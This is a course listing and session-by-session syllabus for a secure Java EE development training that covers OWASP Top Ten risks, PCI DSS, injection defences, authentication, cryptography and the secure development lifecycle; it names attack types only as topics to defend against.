Code Highly Secure JavaEE Applications That Follow OWASP Standards And Protect Your Business From Cyber Attack

This course will provide delegates with a sound understanding of current Payment Card Industry Secure Data Security Standards for building secure applications in the Java EE Framework

Course Content

This course has been developed for real-world, commercial scenarios by our expert instructors. See below for detailed syllabus. If you have a technical question, please email [email protected]

What you will learn

1. Security Principles
2. An understanding of OWASP and PCI DSS
3. Writing compliant Java code
4. How to test security
5. How to build privacy into you application
6. How to secure installations
7. How to write secure documentation and error messages.
8. How secuity and security concerns can be integrated into your development lifecycle

Session 1: Introduction

Introduction to tutor and course.

Session 2: Secure Development Overview

Security of Applications, why applications via the web are different, What Web App security is and is not. Legal compliance.

Session 3: PCI-DSS

What it is, The 12 requirements of PCI-DSS, who must comply, cost of non-compliance

Session 4: OWASP

What is OWASP, Open Web Application Security Project, The OWASP Top Ten: A1: Injection, A2: Cross-Site Scripting (XSS), A3: Broken Authentication and Session Management, A4: Insecure Direct Object References, A5: Cross-Site Request Forgery (CSRF), A6: Security Misconfiguration, A7: Insecure Cryptographic Storage, A8: Failure to Restrict URL Access, A9: Insufficient Transport Layer Protection, A10: Unvalidated Redirects and Forwards. Other threats are considers as and when appropriate.

Session 5: Securing Application Servers

The issue of Security Misconfiguration. The need to secure the Application Server, hardening the Application Server. Hardening the OS and the Database.

Session 6: Input Validation

Validation input from HttpServletRequest, Cross Site Scripting and defending against XSS, Insecure Direct Object References. Cross Site request forgery (CSRF). Output Encoding. Buffer Overflows. Malicious File Execution.

Session 7: SQL Injection

How SQL Injection works and how to defend against it.

Session 8: Further Injection Flaws

XML/XPath injection, LDAP, Command and resource Injection. Unvalidated Redirects and Forwards

Session 9: Securing Web Applications

Broken Authentication and Session management. Authentication and Authorization, Web app security, Spring Security, X509 Certificates, Session Handling, Session Fixation, JAAS, Single Sign On, Captcha

Session 10: Java EE Security

Java EE Authorization, Spring Authorization.

Session 11: Secure Web Services

JAX-WS based web services, why security is an issue and using WS-Security to secure above and beyond basic authentication/authorisation and SSL.

Session 12: Additional Security Issues

Privilege Escalation, Denial of Service. People, Race conditions, Brute Forcing.

Session 13: Leaking information

Exception handling, Logging, Failure to Restrict URL Access.

Session 14: Cryptography and data protection

Insecure Cryptography Storage, Insufficient transport Layer protection. Password Hashing, Using a Salt. JCA/JCE for cryptography, JSSE for SSL/TLS

Session 15: Secure Development Lifecycle

SDLC as part of a software lifecycle